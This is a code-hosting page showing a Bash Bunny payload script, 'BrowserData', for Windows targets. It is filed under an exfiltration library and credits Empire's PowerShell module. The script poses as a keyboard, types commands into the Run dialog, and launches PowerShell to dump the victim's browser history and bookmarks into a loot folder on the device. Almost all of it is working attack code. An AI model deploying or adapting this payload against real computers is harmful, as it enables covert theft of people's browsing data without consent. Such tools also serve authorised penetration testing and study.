Files
bashbunny-payloads/payloads/library/exfiltration/browserData/payload.txt

40 lines
1.2 KiB
Bash
Executable File
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
#!/bin/bash
#
# Title: BrowserData
# Author: zachstanford
# Version: 0.1
# Targets: Windows
# Attack Modes: HID, STORAGE
# Description: Dumps browser info like history and bookmarks from powershell script
# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
# Credits to this Empire's powershell script:
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
#
# LEDS:
# Blue: Running Script
# Magenta: Finished
# Not sure if this is the right variable. Feel free to change it.
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED R SLOW
LOOTDIR=/root/udisk/loot/BrowserData
mkdir -p $LOOTDIR
LED B SLOW
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING "powershell \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Get-BrowserData.ps1'); $bunny =(gwmi win32_volume -f label=BashBunny' | Select-Object -ExpandProperty DriveLetter); Get-BrowserInformation | Out-File -Append $bunny\loot\BrowserData\$env:computername.txt\""
Q ENTER
Q DELAY 2000
Q STRING exit
Q ENTER
sync
LED M SLOW